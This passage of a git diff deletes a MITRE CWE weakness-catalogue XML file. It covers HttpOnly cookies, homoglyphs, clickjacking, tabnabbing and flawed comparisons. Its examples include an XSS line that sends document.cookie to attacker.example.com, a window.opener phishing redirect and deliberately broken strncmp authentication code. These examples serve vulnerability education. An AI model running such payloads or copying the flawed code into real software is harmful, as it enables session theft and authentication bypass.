(ICS-ALERT-20-063-01): SweynTooth Vulnerabilities + 2020 + --03 + ---04 + https://www.cisa.gov/news-events/ics-alerts/ics-alert-20-063-01 + 2023-04-07 + + + Matheus E. Garbelini, Sudipta Chattopadhyay, Chundong Wang, Singapore University of Technology and Design + Unleashing Mayhem over Bluetooth Low Energy + 2020 + --03 + ---04 + https://asset-group.github.io/disclosures/sweyntooth/ + 2023-01-25 + + + CISA + Alert (AA21-356A): Mitigating Log4Shell and Other Log4j-Related Vulnerabilities + 2021 + --12 + ---22 + https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a + 2023-04-07 + + + SC Media + What Log4Shell taught us about application security, and how to respond now + 2022 + --07 + ---05 + https://www.scmagazine.com/resource/application-security/what-log4shell-taught-us-about-appsec-and-how-to-respond + 2023-01-26 + + + David Fiser, Alfredo Oliveira + Analyzing the Hidden Danger of Environment Variables for Keeping Secrets + 2022 + --08 + ---17 + https://www.trendmicro.com/en_us/research/22/h/analyzing-hidden-danger-of-environment-variables-for-keeping-secrets.html + 2023-01-26 + + + Nicolas Harraudeau + Using environment variables is security-sensitive + 2021 + --04 + ---28 + https://sonarsource.atlassian.net/browse/RSPEC-5304 + 2023-01-26 + + + Ali Youssef + A Framework for a Medical Device Security Program at a Healthcare Delivery Organization + 2022 + --08 + ---08 + https://array.aami.org/content/news/framework-medical-device-security-program-healthcare-delivery-organization + 2023-04-07 + + + Cloud Security Alliance + Shared Responsibility Model Explained + 2020 + --08 + ---26 + https://cloudsecurityalliance.org/blog/2020/08/26/shared-responsibility-model-explained/ + 2023-01-28 + + + Melissa Chase, Steven Christey Coley, Julie Connolly, Ronnie Daldos, Margie Zuk + Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook + 2022 + --11 + ---14 + https://www.mitre.org/news-insights/publication/medical-device-cybersecurity-regional-incident-preparedness-and-response + 2023-01-28 + + + Cyrix coma bug + 2006 + --03 + ---22 + Wikipedia + https://en.wikipedia.org/wiki/Cyrix_coma_bug + + + Gary Wheeler + Undocumented M6800 Instructions + 1977 + --12 + https://spivey.oriel.ox.ac.uk/wiki/images-corner/1/1a/Undoc6800.pdf + 2023-04-20 + + + exec package - os/exec - Go Packages + 2023 + --04 + ---04 + https://pkg.go.dev/os/exec + 2023-04-21 + + + Brian M. Carlson + Git LFS Changelog + 2022 + --04 + ---19 + https://github.com/git-lfs/git-lfs/commit/032dca8ee69c193208cd050024c27e82e11aef81 + 2023-04-21 + + + Center for Internet Security + CIS Google Cloud Computing Platform Benchmark version 1.3.0 + 2022 + --03 + ---31 + https://www.cisecurity.org/benchmark/google_cloud_computing_platform + 2023-04-24 + + + National Security Agency + Software Memory Safety + 2022 + --11 + ---10 + https://media.defense.gov/2022/Nov/10/2003112742/-1/-1/0/CSI_SOFTWARE_MEMORY_SAFETY.PDF + 2023-04-25 + + + Prossimo + What is memory safety and why does it matter? + https://www.memorysafety.org/docs/memory-safety/ + 2023-04-25 + + + MITRE + CVE --> CWE Mapping Guidance - Quick Tips + 2021 + --03 + ---25 + https://cwe.mitre.org/documents/cwe_usage/quick_tips.html + + + Robert R. Collins + The Pentium F00F Bug + 1998 + --05 + ---01 + https://www.drdobbs.com/embedded-systems/the-pentium-f00f-bug/184410555 + 2023-04-25 + + + John Richard Moser + Prelink and address space randomization + 2006 + --07 + ---05 + https://lwn.net/Articles/190139/ + 2023-04-26 + + + Dmitry Evtyushkin, Dmitry Ponomarev, Nael Abu-Ghazaleh + Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR + 2016 + http://www.cs.ucr.edu/~nael/pubs/micro16.pdf + 2023-04-26 + + + D3FEND + Stack Frame Canary Validation (D3-SFCV) + 2023 + https://d3fend.mitre.org/technique/d3f:StackFrameCanaryValidation/ + 2023-04-26 + + + D3FEND + Segment Address Offset Randomization (D3-SAOR) + 2023 + https://d3fend.mitre.org/technique/d3f:SegmentAddressOffsetRandomization/ + 2023-04-26 + + + D3FEND + Process Segment Execution Prevention (D3-PSEP) + 2023 + https://d3fend.mitre.org/technique/d3f:ProcessSegmentExecutionPrevention/ + 2023-04-26 + + + Alexander Sotirov and Mark Dowd + Bypassing Browser Memory Protections: Setting back browser security by 10 years + 2008 + https://www.blackhat.com/presentations/bh-usa-08/Sotirov_Dowd/bh08-sotirov-dowd.pdf + 2023-04-26 + + + Hackatdac19 ariane_soc_pkg.sv + 2019 + https://github.com/HACK-EVENT/hackatdac19/blob/619e9fb0ef32ee1e01ad76b8732a156572c65700/tb/ariane_soc_pkg.sv#L44:L62 + 2023-06-21 + + + Florian Zaruba + Michael Schaffner + Andreas Traber + csr_regfile.sv + 2019 + https://github.com/openhwgroup/cva6/blob/7951802a0147aedb21e8f2f6dc1e1e9c4ee857a2/src/csr_regfile.sv#L45 + 2023-06-21 + + + Hackatdac19 csr_regfile.sv + 2019 + https://github.com/HACK-EVENT/hackatdac19/blob/619e9fb0ef32ee1e01ad76b8732a156572c65700/src/csr_regfile.sv#L854:L857 + 2023-06-21 + + + Andrew Waterman + Yunsup Lee + Rimas Avižienis + David Patterson + Krste Asanović + The RISC-V Instruction Set Manual + Volume II: Privileged Architecture + 2016 + --11 + ---04 + https://people.eecs.berkeley.edu/~krste/papers/riscv-privileged-v1.9.1.pdf + 2023-06-21 + + + Hackatdac19 commit_stage.sv + 2019 + https://github.com/HACK-EVENT/hackatdac19/blob/619e9fb0ef32ee1e01ad76b8732a156572c65700/src/commit_stage.sv#L287:L290 + 2023-06-21 + + + Florian Zaruba + Michael Schaffner + Stefan Mach + Andreas Traber + commit_stage.sv + 2018 + https://github.com/openhwgroup/cva6/blob/7951802a0147aedb21e8f2f6dc1e1e9c4ee857a2/src/commit_stage.sv#L296:L301 + 2023-06-21 + + + 2023 CWE Top 25 Most Dangerous Software Weaknesses + 2023 + --06 + ---29 + http://cwe.mitre.org/top25/archive/2023/2023_cwe_top25.html + 2023-06-29 + + + Florian Zaruba + Michael Schaffner + Andreas Traber + csr_regfile.sv + 2019 + https://github.com/openhwgroup/cva6/blob/7951802a0147aedb21e8f2f6dc1e1e9c4ee857a2/src/csr_regfile.sv#L868:L871 + 2023-06-21 + + + \ No newline at end of file diff --git a/src/main/resources/nist/cwec_v4.6.xml b/src/main/resources/nist/cwec_v4.6.xml deleted file mode 100755 index b43c49ddd..000000000 --- a/src/main/resources/nist/cwec_v4.6.xml +++ /dev/null @@ -1,170977 +0,0 @@ - - - - The software uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag. - The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker's script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS. - - - - - - - - - An HTTP cookie is a small piece of data attributed to a specific website and stored on the user's computer by the user's web browser. This data can be leveraged for a variety of purposes including saving information entered into form fields, recording user activity, and for authentication purposes. Cookies used to save or record information generated by the user are accessed and modified by script code embedded in a web page. While cookies used for authentication are created by the website's server and sent to the user to be attached to future requests. These authentication cookies are often not meant to be accessed by the web page sent to the user, and are instead just supposed to be attached to future requests to verify authentication details. - - - - Implementation - - - Architecture and Design - - - Medium - - - Confidentiality - Read Application Data - If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties. - - - Integrity - Gain Privileges or Assume Identity - If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user. - - - - - Implementation - Leverage the HttpOnly flag when setting a sensitive cookie in a response. - High - While this mitigation is effective for protecting cookies from a browser's own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie. - - - - - In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client. - The snippet of code below establishes a new cookie to hold the sessionID. - - String sessionID = generateSessionId();Cookie c = new Cookie("session_id", sessionID);response.addCookie(c); - - The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as: - - document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">' - - When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie. - To mitigate the risk, use the setHttpOnly(true) method. - - String sessionID = generateSessionId();Cookie c = new Cookie("session_id", sessionID);c.setHttpOnly(true);response.addCookie(c); - - - - - - CVE-2014-3852 - CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3852 - - - CVE-2015-4138 - Appliance for managing encrypted communications does not use HttpOnly flag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4138 - - - - - - - - - - - CWE Content Team - MITRE - 2017-01-02 - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - - - The software displays information or identifiers to a user, but the display mechanism does not make it easy for the user to distinguish between visually similar or identical glyphs (homoglyphs), which may cause the user to misinterpret a glyph and perform an unintended, insecure action. - - Some glyphs, pictures, or icons can be semantically distinct to a program, while appearing very similar or identical to a human user. These are referred to as homoglyphs. For example, the lowercase "l" (ell) and uppercase "I" (eye) have different character codes, but these characters can be displayed in exactly the same way to a user, depending on the font. This can also occur between different character sets. For example, the Latin capital letter "A" and the Greek capital letter "Α" (Alpha) are treated as distinct by programs, but may be displayed in exactly the same way to a user. Accent marks may also cause letters to appear very similar, such as the Latin capital letter grave mark "À" and its equivalent "À" with the acute accent. - Adversaries can exploit this visual similarity for attacks such as phishing, e.g. by providing a link to an attacker-controlled hostname that looks like a hostname that the victim trusts. In a different use of homoglyphs, an adversary may create a back door username that is visually similar to the username of a regular user, which then makes it more difficult for a system administrator to detect the malicious username while reviewing logs. - - - - - - - Resultant - - - - - - - - - Homograph Attack - "Homograph" is often used as a synonym of "homoglyph" by researchers, but according to Wikipedia, a homograph is a word that has multiple, distinct meanings. - - - - - Architecture and Design - This weakness may occur when characters from various character sets are allowed to be interchanged within a URL, username, email address, etc. without any notification to the user or underlying system being used. - - - Implementation - - - Medium - - - Integrity - Confidentiality - Other - An attacker may ultimately redirect a user to a malicious website, by deceiving the user into believing the URL they are accessing is a trusted domain. However, the attack can also be used to forge log entries by using homoglyphs in usernames. Homoglyph manipulations are often the first step towards executing advanced attacks such as stealing a user's credentials, Cross-Site Scripting (XSS), or log forgery. If an attacker redirects a user to a malicious site, the attacker can mimic a trusted domain to steal account credentials and perform actions on behalf of the user, without the user's knowledge. Similarly, an attacker could create a username for a website that contains homoglyph characters, making it difficult for an admin to review logs and determine which users performed which actions. - - - - - Manual Dynamic Analysis - If utilizing user accounts, attempt to submit a username that contains homoglyphs. Similarly, check to see if links containing homoglyphs can be sent via email, web browsers, or other mechanisms. - Moderate - - - - - Implementation - - Use a browser that displays Punycode for IDNs in the URL and status bars, or which color code various scripts in URLs. - Due to the prominence of homoglyph attacks, several browsers now help safeguard against this attack via the use of Punycode. For example, Mozilla Firefox and Google Chrome will display IDNs as Punycode if top-level domains do not restrict which characters can be used in domain names or if labels mix scripts for different languages. - - - - Implementation - - Use an email client that has strict filters and prevents messages that mix character sets to end up in a user's inbox. - Certain email clients such as Google's GMail prevent the use of non-Latin characters in email addresses or in links contained within emails. This helps prevent homoglyph attacks by flagging these emails and redirecting them to a user's spam folder. - - - - - - The following looks like a simple, trusted URL that a user may frequently access. - - http://www.еxаmрlе.соm - - However, the URL above is comprised of Cyrillic characters that look identical to the expected ASCII characters. This results in most users not being able to distinguish between the two and assuming that the above URL is trusted and safe. The "e" is actually the "CYRILLIC SMALL LETTER IE" which is represented in HTML as the character &#x0435, while the "a" is actually the "CYRILLIC SMALL LETTER A" which is represented in HTML as the character &#x0430. The "p", "c", and "o" are also Cyrillic characters in this example. Viewing the source reveals a URL of "http://www.&#x0435;x&#x0430;m&#x0440;l&#x0435;.&#x0441;&#x043e;m". An adversary can utilize this approach to perform an attack such as a phishing attack in order to drive traffic to a malicious website. - - - The following displays an example of how creating usernames containing homoglyphs can lead to log forgery. - Assume an adversary visits a legitimate, trusted domain and creates the account "admin" where the 'a' and 'i' characters are Cyrillic characters instead of the expected ACII. Any actions the adversary performs will be saved to the log file and look like they came from a legitimate administrator account. - - 123.123.123.123 аdmіn [17/Jul/2017:09:05:49 -0400] "GET /example/users/userlist HTTP/1.1" 401 12846123.123.123.123 аdmіn [17/Jul/2017:09:06:51 -0400] "GET /example/users/userlist HTTP/1.1" 200 4523123.123.123.123 аdmіn [17/Jul/2017:09:10:02 -0400] "GET /example/users/editusers HTTP/1.1" 200 6291123.123.123.123 аdmіn [17/Jul/2017:09:10:02 -0400] "GET /example/users/editusers HTTP/1.1" 200 6291123.123.123.123 аdmіn [17/Jul/2017:09:10:02 -0400] "GET /example/users/editusers HTTP/1.1" 200 6291123.123.123.123 аdmіn [17/Jul/2017:09:10:02 -0400] "GET /example/users/editusers HTTP/1.1" 200 6291 - - However, upon closer inspection, the account that generated these log entries is "&#x0430;dm&#x0456;n". This makes it more difficult to determine which actions were performed by the adversary and which actions were executed by the legitimate "admin" account. - - - - - CVE-2013-7236 - web forum allows impersonation of users with homoglyphs in account names - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7236 - - - CVE-2012-0584 - Improper character restriction in URLs in web browser - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0584 - - - CVE-2009-0652 - Incomplete denylist does not include homoglyphs of "/" and "?" characters in URLs - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0652 - - - CVE-2017-5015 - web browser does not convert hyphens to punycode, allowing IDN spoofing in URLs - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5015 - - - CVE-2005-0233 - homoglyph spoofing using punycode in URLs and certificates - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0233 - - - CVE-2005-0234 - homoglyph spoofing using punycode in URLs and certificates - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0234 - - - CVE-2005-0235 - homoglyph spoofing using punycode in URLs and certificates - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0235 - - - - - - - - - CWE Content Team - MITRE - 2017-07-24 - - - CWE Content Team - MITRE - 2018-03-27 - updated Demonstrative_Examples, Description, References - - - CWE Content Team - MITRE - 2019-01-03 - updated Demonstrative_Examples, Description, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples - - - - - The application uses multiple validation forms with the same name, which might cause the Struts Validator to validate a form that the programmer does not expect. - If two validation forms have the same name, the Struts Validator arbitrarily chooses one of the forms to use for input validation and discards the other. This decision might not correspond to the programmer's expectations, possibly leading to resultant weaknesses. Moreover, it indicates that the validation logic is not up-to-date, and can indicate that other, more subtle validation errors are present. - - - - - - - - Primary - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Implementation - The DTD or schema validation will not catch the duplicate occurrence of the same form name. To find the issue in the implementation, manual checks or automated static analysis could be applied to the xml configuration files. - - - - - Two validation forms with the same name. - - <form-validation><formset><form name="ProjectForm"> ... </form><form name="ProjectForm"> ... </form></formset></form-validation> - - It is critically important that validation logic be maintained and kept in sync with the rest of the application. - - - - - Struts: Duplicate Validation Forms - - - SFP24 - Tainted input to command - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-12-28 - updated Background_Details, Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Background_Details, Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with. - A web application is expected to place restrictions on whether it is allowed to be rendered within frames, iframes, objects, embed or applet elements. Without the restrictions, users can be tricked into interacting with the application when they were not intending to. - - - - - - - - - - - Clickjacking - - - UI Redress Attack - - - Tapjacking - "Tapjacking" is similar to clickjacking, except it is used for mobile applications in which the user "taps" the application instead of performing a mouse click. - - - - - Implementation - - - - - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Read Application Data - Modify Application Data - An attacker can trick a user into performing actions that are masked and hidden from the user's view. The impact varies widely, depending on the functionality of the underlying application. For example, in a social media application, clickjacking could be used to trik the user into changing privacy settings. - - - - - Implementation - - The use of X-Frame-Options allows developers of web content to restrict the usage of their application within the form of overlays, frames, or iFrames. The developer can indicate from which domains can frame the content. - The concept of X-Frame-Options is well documented, but implementation of this protection mechanism is in development to cover gaps. There is a need for allowing frames from multiple domains. - - - - Implementation - - A developer can use a "frame-breaker" script in each page that should not be framed. This is very helpful for legacy browsers that do not support X-Frame-Options security feature previously mentioned. - It is also important to note that this tactic has been circumvented or bypassed. Improper usage of frames can persist in the web application through nested frames. The "frame-breaking" script does not intuitively account for multiple nested frames that can be presented to the user. - - - - Implementation - This defense-in-depth technique can be used to prevent the improper usage of frames in web applications. It prioritizes the valid sources of data to be loaded into the application through the usage of declarative policies. Based on which implementation of Content Security Policy is in use, the developer should use the "frame-ancestors" directive or the "frame-src" directive to mitigate this weakness. Both directives allow for the placement of restrictions when it comes to allowing embedded content. - - - - - CVE-2017-7440 - E-mail preview feature in a desktop application allows clickjacking attacks via a crafted e-mail message - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7440 - - - CVE-2017-5697 - Hardware/firmware product has insufficient clickjacking protection in its web user interface - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5697 - - - CVE-2017-4015 - Clickjacking in data-loss prevention product via HTTP response header. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-4015 - - - CVE-2016-2496 - Tapjacking in permission dialog for mobile OS allows access of private storage using a partially-overlapping window. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2496 - - - CVE-2015-1241 - Tapjacking in web browser related to page navigation and touch/gesture events. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1241 - - - CVE-2017-0492 - System UI in mobile OS allows a malicious application to create a UI overlay of the entire screen to gain privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0492 - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2017-08-01 - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying security-critical properties of the window.opener object, such as the location property. - When a user clicks a link to an external site ("target"), the target="_blank" attribute causes the target site's contents to be opened in a new window or tab, which runs in the same process as the original page. The window.opener object records information about the original page that offered the link. If an attacker can run script on the target page, then they could read or modify certain properties of the window.opener object, including the location property - even if the original and target site are not the same origin. An attacker can modify the location property to automatically redirect the user to a malicious site, e.g. as part of a phishing attack. Since this redirect happens in the original window/tab - which is not necessarily visible, since the browser is focusing the display on the new target page - the user might not notice any suspicious redirection. - - - - - - - - - - tabnabbing - - - - - Architecture and Design - This weakness is introduced during the design of an application when the architect does not specify that a linked external document should not be able to alter the location of the calling page. - - - Implementation - This weakness is introduced during the coding of an application when the developer does not include the noopener and/or noreferrer value for the rel attribute. - - - Medium - - - Confidentiality - Alter Execution Logic - The user may be redirected to an untrusted page that contains undesired content or malicious script code. - - - - - Architecture and Design - Specify in the design that any linked external document must not be granted access to the location object of the calling page. - - - Implementation - - When creating a link to an external document using the <a> tag with a defined target, for example "_blank" or a named frame, provide the rel attribute with a value "noopener noreferrer". - If opening the external document in a new window via javascript, then reset the opener by setting it equal to null. - - - - Implementation - - Do not use "_blank" targets. However, this can affect the usability of the application. - - - - - - In this example, the application opens a link in a named window/tab without taking precautions to prevent the called page from tampering with the calling page's location in the browser. - There are two ways that this weakness is commonly seen. The first is when the application generates an <a> tag is with target="_blank" to point to a target site: - - <a href="http://attacker-site.example.com/useful-page.html" target="_blank"> - - If the attacker offers a useful page on this link (or compromises a trusted, popular site), then a user may click on this link. However, the attacker could use scripting code to modify the window.opener's location property to redirect the application to a malicious, attacker-controlled page - such as one that mimics the look and feel of the original application and convinces the user to re-enter authentication credentials, i.e. phishing: - - window.opener.location = 'http://phishing.example.org/popular-bank-page'; - - To mitigate this type of weakness, some browsers support the "rel" attribute with a value of "noopener", which sets the window.opener object equal to null. Another option is to use the "rel" attribute with a value of "noreferrer", which in essence does the same thing. - - <a href="http://attacker-site.example.com/useful-page.html" target="_blank" rel="noopener noreferrer"> - - A second way that this weakness is commonly seen is when opening a new site directly within JavaScript. In this case, a new site is opened using the window.open() function. - - var newWindow = window.open("http://attacker-site.example.com/useful-page.html", "_blank"); - - To mitigate this, set the window.opener object to null. - - var newWindow = window.open("http://attacker-site.example.com/useful-page.html", "_blank");newWindow.opener = null; - - - - - - - - - - - David Deatherage - Silicon Valley Bank - 2017-09-26 - - - CWE Content Team - MITRE - 2018-03-27 - updated Alternate_Terms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Potential_Mitigations - - Improper Restriction of Cross-Origin Permission to window.opener.location - - - - The software performs a comparison between entities that must consider multiple factors or characteristics of each entity, but the comparison does not include one or more of these factors. - - An incomplete comparison can lead to resultant weaknesses, e.g., by operating on the wrong object or making a security decision without considering a required factor. - - - - - - - Primary - - - - - - - - Implementation - - - - - Integrity - Access Control - Alter Execution Logic - Bypass Protection Mechanism - - - - - Testing - Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing. - - - - - Consider an application in which Truck objects are defined to be the same if they have the same make, the same model, and were manufactured in the same year. - - public class Truck { - private String make;private String model;private int year; - public boolean equals(Object o) { - if (o == null) return false;if (o == this) return true;if (!(o instanceof Truck)) return false; - Truck t = (Truck) o; - return (this.make.equals(t.getMake()) && this.model.equals(t.getModel())); - } - } - - Here, the equals() method only checks the make and model of the Truck objects, but the year of manufacture is not included. - - - This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded. - - - /* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */ - - char *username = "admin";char *pass = "password"; - int AuthenticateUser(char *inUser, char *inPass) {if (strncmp(username, inUser, strlen(inUser))) {logEvent("Auth failure of username using strlen of inUser");return(AUTH_FAIL);}if (! strncmp(pass, inPass, strlen(inPass))) {logEvent("Auth success of password using strlen of inUser");return(AUTH_SUCCESS);}else {logEvent("Auth fail of password using sizeof");return(AUTH_FAIL);}} - int main (int argc, char **argv) { - int authResult;if (argc < 3) {ExitError("Usage: Provide a username and password");}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {DoAuthenticatedTask(argv[1]);}else {ExitError("Authentication failed");}} - - In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application's password before determining success. - As a result, this partial comparison leads to improper authentication (CWE-287). - Any of these passwords would still cause authentication to succeed for the "admin" user: - - ppapaspass - - This significantly reduces the search space for an attacker, making brute force attacks more feasible. - The same problem also applies to the username, so values such as "a" and "adm" will succeed for the username. - While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness. - - - - - CWE Content Team - MITRE - 2018-01-04 - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software performs a comparison between two entities, but the entities are of different, incompatible types that cannot be guaranteed to provide correct results when they are directly compared. - In languages that are strictly typed but support casting/conversion, such as C or C++, the programmer might assume that casting one entity to the same type as another entity will ensure that the comparison will be performed correctly, but this cannot be guaranteed. In languages that are not strictly typed, such as PHP or JavaScript, there may be implicit casting/conversion to a type that the programmer is unaware of, causing unexpected results; for example, the string "123" might be converted to a number type. See examples. - - - - - - Primary - - - - - - - - - - Implementation - - - - - Other - Varies by Context - - - - - Testing - Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing. - - - - - CWE Content Team - MITRE - 2018-01-04 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code performs a comparison between two entities, but the comparison examines the wrong factors or characteristics of the entities, which can lead to incorrect results and resultant weaknesses. - This can lead to incorrect results and resultant weaknesses. For example, the code might inadvertently compare references to objects, instead of the relevant contents of those objects, causing two "equal" objects to be considered unequal. - - - - - - Primary - - - - - - - - Implementation - - - - - Other - Varies by Context - - - - - Testing - Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing. - - - - - In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent. - - String str1 = new String("Hello");String str2 = new String("Hello");if (str1 == str2) {System.out.println("str1 == str2");} - - However, the if statement will not be executed as the strings are compared using the "==" operator. For Java objects, such as String objects, the "==" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method: - - if (str1.equals(str2)) {System.out.println("str1 equals str2");} - - - - - - CWE Content Team - MITRE - 2018-01-04 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The application has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate(). - If the code does not call super.validate(), the Validation Framework cannot check the contents of the form against a validation form. In other words, the validation framework will be disabled for the given form. - - - - - - - Primary - - - - - - - The Struts Validator uses a form's validate() method to check the contents of the form properties against the constraints specified in the associated validation form. That means the following classes have a validate() method that is part of the validation framework: ValidatorForm, ValidatorActionForm, DynaValidatorForm, and DynaValidatorActionForm. If the code creates a class that extends one of these classes, and if that class implements custom validation logic by overriding the validate() method, the code must call super.validate() in the validate() implementation. - - - - Implementation - - - - - Other - Other - Disabling the validation framework for a form exposes the application to numerous types of attacks. Unchecked input is the root cause of vulnerabilities like cross-site scripting, process control, and SQL injection. - - - Confidentiality - Integrity - Availability - Other - Other - Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. - - - - - Implementation - Implement the validate() method and call super.validate() within that method. - - - - - In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and the RegistrationForm bean in the Struts framework will maintain the user data. Tthe RegistrationForm class implements the validate method to validate the user input entered into the form. - - public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { - // private variables for registration formprivate String name;private String email;... - public RegistrationForm() {super();} - public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {ActionErrors errors = new ActionErrors();if (getName() == null || getName().length() < 1) {errors.add("name", new ActionMessage("error.name.required"));}return errors;} - - // getter and setter methods for private variables... - } - - Although the validate method is implemented in this example the method does not call the validate method of the ValidatorForm parent class with a call super.validate(). Without the call to the parent validator class only the custom validation will be performed and the default validation will not be performed. The following example shows that the validate method of the ValidatorForm class is called within the implementation of the validate method. - - public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { - - // private variables for registration formprivate String name;private String email;... - public RegistrationForm() {super();} - public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {ActionErrors errors = super.validate(mapping, request);if (errors == null) {errors = new ActionErrors();} - - if (getName() == null || getName().length() < 1) {errors.add("name", new ActionMessage("error.name.required"));}return errors; - } - // getter and setter methods for private variables...} - - - - - - Struts: Erroneous validate() Method - - - SFP24 - Tainted input to command - - - - - - - This could introduce other weaknesses related to missing input validation. - The current description implies a loose composite of two separate weaknesses, so this node might need to be split or converted into a low-level category. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Maintenance_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Background_Details, Common_Consequences, Description, Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 